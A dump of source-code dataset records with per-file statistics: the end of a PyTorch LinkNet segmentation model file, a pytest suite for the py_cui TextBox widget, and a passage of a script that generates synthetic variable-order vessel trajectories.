        e2_resume = self.mixed_7a(e2)
        e3 = self.skip3(e2_resume)
        # Decoder: crop each upsampled map to the skip's spatial size, then add.
        d3 = self.decoder3(e3)[:, :, 0:e2.size(2), 0:e2.size(3)] + e2
        d2 = self.decoder2(d3)[:, :, 0:e1.size(2), 0:e1.size(3)] + e1
        d1 = self.decoder1(d2)[:, :, 0:x1.size(2), 0:x1.size(3)] + x1
        d0 = self.decoder0(d1)
        # Final Classification
        # NOTE(review): finalnorm1/finalnorm2 are registered in __init__ but not
        # applied here, unlike LinkCeption -- confirm whether that is intended.
        f1 = self.finaldeconv1(d0)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkDenseNet161(nn.Module):
    """LinkNet segmentation model with a DenseNet-161 encoder.

    Dense blocks (with their preceding transitions) serve as encoder stages;
    decoding follows the standard LinkNet additive-skip layout.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Output channel widths of densenet161's four dense blocks.
        filters = [384, 768, 2112, 2208]
        densenet = models.densenet161(pretrained=pretrained)
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            self.firstconv = densenet.features.conv0
        else:
            # Non-RGB input: replace the stem conv (pretrained stem weights are lost).
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.stem = nn.Sequential(
            self.firstconv,
            densenet.features.norm0,
            densenet.features.relu0,
            densenet.features.pool0,
        )
        self.encoder1 = nn.Sequential(densenet.features.denseblock1)
        self.encoder2 = nn.Sequential(densenet.features.transition1,
                                      densenet.features.denseblock2)
        self.encoder3 = nn.Sequential(densenet.features.transition2,
                                      densenet.features.denseblock3)
        self.encoder4 = nn.Sequential(densenet.features.transition3,
                                      densenet.features.denseblock4)
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.stem,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head."""
        # Encoder
        x = self.stem(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkDenseNet121(nn.Module):
    """LinkNet-style encoder/decoder segmentation network built on a
    (optionally ImageNet-pretrained) DenseNet-121 encoder.

    NOTE(review): attribute assignment order is load-bearing — it fixes the
    parameter / state_dict key names, so do not reorder the assignments.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Output channel counts of denseblock1..denseblock4 for DenseNet-121.
        filters = [256, 512, 1024, 1024]
        densenet = models.densenet121(pretrained=pretrained)
        # ImageNet normalization stats, exposed for callers to preprocess with.
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            # Reuse the pretrained RGB stem convolution.
            self.firstconv = densenet.features.conv0
        else:
            # Non-RGB input: fresh (randomly initialized) conv with the same geometry.
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        # Stem: conv -> BN -> ReLU -> max-pool, straight from DenseNet.
        self.stem = nn.Sequential(
            self.firstconv,
            densenet.features.norm0,
            densenet.features.relu0,
            densenet.features.pool0,
        )
        # Encoder stages; transitions halve resolution between dense blocks.
        self.encoder1 = nn.Sequential(densenet.features.denseblock1)
        self.encoder2 = nn.Sequential(densenet.features.transition1,
                                      densenet.features.denseblock2)
        self.encoder3 = nn.Sequential(densenet.features.transition2,
                                      densenet.features.denseblock3)
        self.encoder4 = nn.Sequential(densenet.features.transition3,
                                      densenet.features.denseblock4)
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)

    def require_encoder_grad(self, requires_grad):
        """Set requires_grad on every stem/encoder parameter."""
        blocks = [self.stem,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad

    def freeze(self):
        """Disable encoder gradients."""
        self.require_encoder_grad(False)

    def unfreeze(self):
        """Re-enable encoder gradients."""
        self.require_encoder_grad(True)

    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder-decoder pass; returns raw per-class score maps."""
        # Encoder
        x = self.stem(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections (element-wise addition, so channel
        # counts of decoder outputs must match the encoder stages).
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class CoarseLinkNet50(nn.Module):
    """LinkNet-style segmentation network with a ResNet-50 encoder and a
    coarse convolutional head (no final transposed-conv upsampling).

    NOTE(review): attribute assignment order fixes parameter/state_dict key
    names — do not reorder the assignments.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Output channel counts of resnet50 layer1..layer4.
        filters = [256, 512, 1024, 2048]
        resnet = models.resnet50(pretrained=pretrained)
        # ImageNet normalization stats, exposed for callers to preprocess with.
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        # Support inputs with other channel counts (e.g. 8-band imagery) by
        # swapping in an untrained stem conv with the same geometry.
        if num_channels == 3:
            self.firstconv = resnet.conv1
        else:
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.firstbn = resnet.bn1
        self.firstrelu = resnet.relu
        self.firstmaxpool = resnet.maxpool
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier ("coarse": plain convs, output stays at the
        # decoder-1 resolution rather than being deconvolved up).
        self.finalconv1 = nn.Conv2d(filters[0], 32, 2, padding=1)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, num_classes, 2, padding=1)

    def freeze(self):
        """Disable encoder gradients."""
        self.require_encoder_grad(False)

    def unfreeze(self):
        """Re-enable encoder gradients."""
        self.require_encoder_grad(True)

    def require_encoder_grad(self, requires_grad):
        """Set requires_grad on every encoder parameter.

        NOTE(review): unlike the DenseNet variants this list starts at
        `self.firstconv` and omits `firstbn` — BN affine params stay
        trainable when frozen; confirm whether that is intentional.
        """
        blocks = [self.firstconv,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad

    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder-decoder pass; returns raw per-class score maps."""
        # Encoder
        x = self.firstconv(x)
        x = self.firstbn(x)
        x = self.firstrelu(x)
        x = self.firstmaxpool(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finalconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        return f3
| 35.73301
| 184
| 0.51551
| 4,500
| 44,166
| 4.910667
| 0.063556
| 0.050683
| 0.042312
| 0.045796
| 0.876324
| 0.866459
| 0.857498
| 0.857498
| 0.85243
| 0.85071
| 0
| 0.067053
| 0.394557
| 44,166
| 1,236
| 185
| 35.73301
| 0.759349
| 0.054997
| 0
| 0.840717
| 0
| 0
| 0.00389
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060127
| false
| 0
| 0.008439
| 0
| 0.093882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a22d999535acfe333a40e0208848123a290fbab
| 3,778
|
py
|
Python
|
tests/test_text_box.py
|
telday/py_cui
|
9f7a5f9a72733effd5e50322774988ca998a5e8a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_text_box.py
|
telday/py_cui
|
9f7a5f9a72733effd5e50322774988ca998a5e8a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_text_box.py
|
telday/py_cui
|
9f7a5f9a72733effd5e50322774988ca998a5e8a
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
import py_cui
# Shared 10x10 grid over a 100x100 character area, reused by every TextBox test below.
grid_test = py_cui.grid.Grid(10, 10, 100, 100)
def test_move_right():
    """A single move_right advances both the text position and screen column."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    box.move_right()
    assert box.cursor_text_pos == 1
    assert box.cursor_x == 13
def test_move_left_side():
    """move_left from the middle of the text steps both counters back by one."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    origin_x = box.cursor_x
    box.cursor_x += 5
    box.cursor_text_pos = 5
    box.move_left()
    assert box.cursor_text_pos == 4
    assert box.cursor_x == origin_x + 4
def test_clear():
    """clear() empties the text and resets the cursor to the left edge."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    box.clear()
    assert box.get() == ''
    assert box.cursor_text_pos == 0
    assert box.cursor_x == 12
def test_get_initial():
    """A freshly built TextBox exposes its initial text and cursor bounds."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    assert box.cursor_text_pos == 0
    assert box.cursor_x == 12
    assert box.get() == 'Hello World'
    assert box.cursor_max_left == 12
    assert box.cursor_max_right == 27
def test_insert_char():
    """Inserting a character at position 0 prepends it and advances the cursor."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    box.insert_char(py_cui.keys.KEY_D_UPPER)
    assert box.get() == 'DHello World'
    assert box.cursor_x == box.cursor_max_left + 1
    assert box.cursor_text_pos == 1
def test_erase_char():
    """erase_char removes the character left of the cursor (backspace)."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    for _ in range(2):
        box.move_right()
    box.erase_char()
    assert box.cursor_x == box.cursor_max_left + 1
    assert box.cursor_text_pos == 1
    assert box.get() == 'Hllo World'
def test_get_edited():
    """A mixed erase/insert sequence produces the expected text and cursor."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    for _ in range(3):
        box.move_right()
    box.erase_char()
    box.insert_char(py_cui.keys.KEY_A_LOWER)
    box.insert_char(py_cui.keys.KEY_E_UPPER)
    assert box.cursor_x == box.cursor_max_left + 4
    assert box.cursor_text_pos == 4
    assert box.get() == 'HeaElo World'
def test_jump_to_start():
    """jump_to_start resets the cursor without modifying the text."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    for _ in range(4):
        box.move_right()
    box.jump_to_start()
    assert box.get() == 'Hello World'
    assert box.cursor_text_pos == 0
    assert box.cursor_x == 12
def test_jump_to_end():
    """jump_to_end places the cursor just past the final character."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    box.jump_to_end()
    assert box.cursor_text_pos == 11
    assert box.cursor_x == box.cursor_max_left + 11
def test_move_right_overflow():
    """Moving right past the end stops at the text length; the on-screen
    column is clamped by the (narrow, 1-column-wide) viewport."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 1, 1, 0, 'Hello World!!!')
    for _ in range(20):
        box.move_right()
    assert box.cursor_text_pos == 14
    assert box.cursor_x == box.cursor_max_left + 5
def test_move_left_overflow():
    """Moving left at position 0 is a no-op."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    box.move_left()
    assert box.cursor_text_pos == 0
    assert box.cursor_x == 12
def test_set_text():
    """set_text replaces the contents and clamps the cursor to the new end."""
    box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0, 'Hello World')
    for _ in range(7):
        box.move_right()
    box.set_text('Hi')
    assert box.get() == 'Hi'
    assert box.cursor_text_pos == 2
    assert box.cursor_x == box.cursor_max_left + 2
| 35.980952
| 99
| 0.67099
| 662
| 3,778
| 3.510574
| 0.101208
| 0.216867
| 0.201377
| 0.212565
| 0.832186
| 0.802496
| 0.760327
| 0.760327
| 0.680293
| 0.669966
| 0
| 0.04325
| 0.192165
| 3,778
| 104
| 100
| 36.326923
| 0.718218
| 0
| 0
| 0.447059
| 0
| 0
| 0.070672
| 0
| 0
| 0
| 0
| 0
| 0.388235
| 1
| 0.141176
| false
| 0
| 0.023529
| 0
| 0.164706
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a39fa054a7ffdfc95ebc5723984fd9c982177fb
| 24,860
|
py
|
Python
|
tutorial/code/dependencies/BuildSyntheticTrajectoriesOfVariableOrders.py
|
msaebi1993/hon
|
2c89ad43911707e3185f18ebe8686d353aa50c83
|
[
"MIT"
] | 48
|
2016-05-31T03:36:04.000Z
|
2022-01-18T15:29:10.000Z
|
tutorial/code/dependencies/BuildSyntheticTrajectoriesOfVariableOrders.py
|
msaebi1993/hon
|
2c89ad43911707e3185f18ebe8686d353aa50c83
|
[
"MIT"
] | 8
|
2018-08-28T19:57:39.000Z
|
2021-04-22T15:58:20.000Z
|
tutorial/code/dependencies/BuildSyntheticTrajectoriesOfVariableOrders.py
|
msaebi1993/hon
|
2c89ad43911707e3185f18ebe8686d353aa50c83
|
[
"MIT"
] | 14
|
2016-11-07T17:01:32.000Z
|
2021-05-21T08:46:55.000Z
|
import random
import concurrent.futures
def NextStep(port):
    """Unbiased step on the wrapped 10x10 port grid.

    Moves down or right with equal probability; both directions wrap
    around the grid edges.
    """
    down = (port + 10) % 100
    right = (port + 1) % 10 + 10 * int(port / 10)
    return random.choice([down, right])
def BiasedNextStep(port):
    """Right-biased step on the wrapped 10x10 port grid: right with
    probability 0.9, otherwise down."""
    down = (port + 10) % 100
    right = (port + 1) % 10 + 10 * int(port / 10)
    if random.random() < .9:
        return right
    return down
def AltBiasedNextStep(port):
    """Down-biased step on the wrapped 10x10 port grid: right with
    probability 0.1, otherwise down."""
    down = (port + 10) % 100
    right = (port + 1) % 10 + 10 * int(port / 10)
    if random.random() < .1:
        return right
    return down
def MixedBiasedNextStep(port):
    """Mixed-bias step: right with probability 110/300 (~0.367), else down."""
    down = (port + 10) % 100
    right = (port + 1) % 10 + 10 * int(port / 10)
    if random.random() < 110/300:
        return right
    return down
def AltMixedBiasedNextStep(port):
    """Mixed-bias step: right with probability 190/300 (~0.633), else down."""
    down = (port + 10) % 100
    right = (port + 1) % 10 + 10 * int(port / 10)
    if random.random() < 190/300:
        return right
    return down
def WriteTrajectories(trajectories, iteration, NetType):
    """Write trajectories as '<vid> <port> <port> ...' lines to
    '<OutputFolder><iteration:04d>_<NetType>.csv' (OutputFolder is a
    module global). Vessel ids start at 1.
    """
    label = str(iteration).zfill(4)
    print(label, NetType)
    with open(OutputFolder + label + '_' + NetType + '.csv', 'w') as f:
        for vid, trajectory in enumerate(trajectories, start=1):
            f.write(str(vid) + ' ' + ' '.join(map(str, trajectory)) + '\n')
# normal
def SynthesizeNormal(NetworkPrefixCounter):
    """Generate `vessels` trajectories of `steps` unbiased random-walk
    steps each (module globals), then write them as the 'normal' set."""
    trajectories = []
    for _ in range(vessels):
        trajectory = []
        for _ in range(steps):
            if len(trajectory) == 0:
                # Uniform random starting port on the 10x10 grid.
                port = random.randint(0, 99)
            else:
                port = NextStep(trajectory[-1])
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'normal')
# add first order
def SynthesizeAddFirstOrder(NetworkPrefixCounter):
    """Like SynthesizeNormal, but ports 0, 3 and 6 take a down-biased
    (AltBiasedNextStep) step — an added first-order dependency."""
    trajectories = []
    for _ in range(vessels):
        trajectory = []
        for _ in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                prev = trajectory[-1]
                if prev in [0, 3, 6]:
                    port = BiasedNextStep(prev)
                else:
                    port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddFirstOrder')
# modify first order
def SynthesizeModifyFirstOrder(NetworkPrefixCounter):
    """Variant of SynthesizeAddFirstOrder where ports 0, 3 and 6 use the
    opposite bias (AltBiasedNextStep instead of BiasedNextStep)."""
    trajectories = []
    for _ in range(vessels):
        trajectory = []
        for _ in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                prev = trajectory[-1]
                if prev in [0, 3, 6]:
                    port = AltBiasedNextStep(prev)
                else:
                    port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifyFirstOrder')
# add second order
def SynthesizeAddSecondOrder(NetworkPrefixCounter):
    """First-order rules (0/3/6 -> AltBiased) plus one added second-order
    rule: after the transition 27 -> 28 the next step is right-biased.

    Uses module globals `vessels` and `steps`; output written via
    WriteTrajectories under file prefix `NetworkPrefixCounter`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                # Uniform random starting port.
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    # Only first-order history available yet.
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    prev = trajectory[-1]
                    pprev = trajectory[-2]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        # Second-order rule: 27 -> 28 biases the next step.
                        if (pprev, prev) in [(27, 28)]:
                            port = BiasedNextStep(prev)
                        else:
                            port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddSecondOrder')
# Add sophisticated second order
def SynthesizeAddSophisticatedSecondOrder(NetworkPrefixCounter):
    """Second-order rules: (27,28)->Biased, (30,31)/(34,35)->Biased,
    (21,31)/(25,35)->AltBiased, on top of the 0/3/6 first-order rule.

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    prev = trajectory[-1]
                    pprev = trajectory[-2]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        if (pprev, prev) in [(27, 28)]:
                            port = BiasedNextStep(prev)
                        elif (pprev, prev) in [(30, 31), (34, 35)]:
                            port = BiasedNextStep(prev)
                        elif (pprev, prev) in [(21, 31), (25, 35)]:
                            port = AltBiasedNextStep(prev)
                        else:
                            port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddSophisticatedSecondOrder')
# modify second order
def SynthesizeModifySecondOrder(NetworkPrefixCounter):
    """Same structure as AddSophisticatedSecondOrder but with the biases of
    (30,31)/(34,35) and (21,31)/(25,35) swapped (Alt <-> Biased).

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    prev = trajectory[-1]
                    pprev = trajectory[-2]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        if (pprev, prev) in [(27, 28)]:
                            port = BiasedNextStep(prev)
                        elif (pprev, prev) in [(30, 31), (34, 35)]:
                            port = AltBiasedNextStep(prev)
                        elif (pprev, prev) in [(21, 31), (25, 35)]:
                            port = BiasedNextStep(prev)
                        else:
                            port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifySophisticatedSecondOrder')
# add third order
def SynthesizeAddThirdOrder(NetworkPrefixCounter):
    """Second-order rules plus one added third-order rule:
    (61,71,81) -> right-biased next step.

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    if len(trajectory) == 2:
                        # Only two steps of history: second-order rules only.
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
                    else:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        ppprev = trajectory[-3]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(61, 71, 81)]:
                                # The added third-order dependency.
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddThirdOrder')
# add sophisticated third order
def SynthesizeAddSophisticatedThirdOrder(NetworkPrefixCounter):
    """AddThirdOrder plus extra third-order rules:
    (73,74,84)/(76,77,87) -> Biased and (64,74,84)/(67,77,87) -> AltBiased.

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    if len(trajectory) == 2:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
                    else:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        ppprev = trajectory[-3]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(61, 71, 81)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
                                port = BiasedNextStep(prev)
                            elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
                                port = AltBiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
            trajectory.append(port)
        trajectories.append(trajectory)
    WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddSophisticatedThirdOrder')
# modify third order
def SynthesizeModifyThirdOrder(NetworkPrefixCounter):
    """AddSophisticatedThirdOrder with the (73,74,84)/(76,77,87) and
    (64,74,84)/(67,77,87) biases swapped (Alt <-> Biased).

    Uses module globals `vessels` and `steps`.
    """
    trajectories = []
    for vessel in range(vessels):
        trajectory = []
        for step in range(steps):
            if len(trajectory) == 0:
                port = random.randint(0, 99)
            else:
                if len(trajectory) == 1:
                    prev = trajectory[-1]
                    if prev in [0, 3, 6]:
                        port = AltBiasedNextStep(prev)
                    else:
                        port = NextStep(prev)
                else:
                    if len(trajectory) == 2:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
                                port = BiasedNextStep(prev)
                            elif (pprev, prev) in [(30, 31), (34, 35)]:
                                port = AltBiasedNextStep(prev)
                            elif (pprev, prev) in [(21, 31), (25, 35)]:
                                port = BiasedNextStep(prev)
                            else:
                                port = NextStep(prev)
                    else:
                        prev = trajectory[-1]
                        pprev = trajectory[-2]
                        ppprev = trajectory[-3]
                        if prev in [0, 3, 6]:
                            port = AltBiasedNextStep(prev)
                        else:
                            if (pprev, prev) in [(27, 28)]:
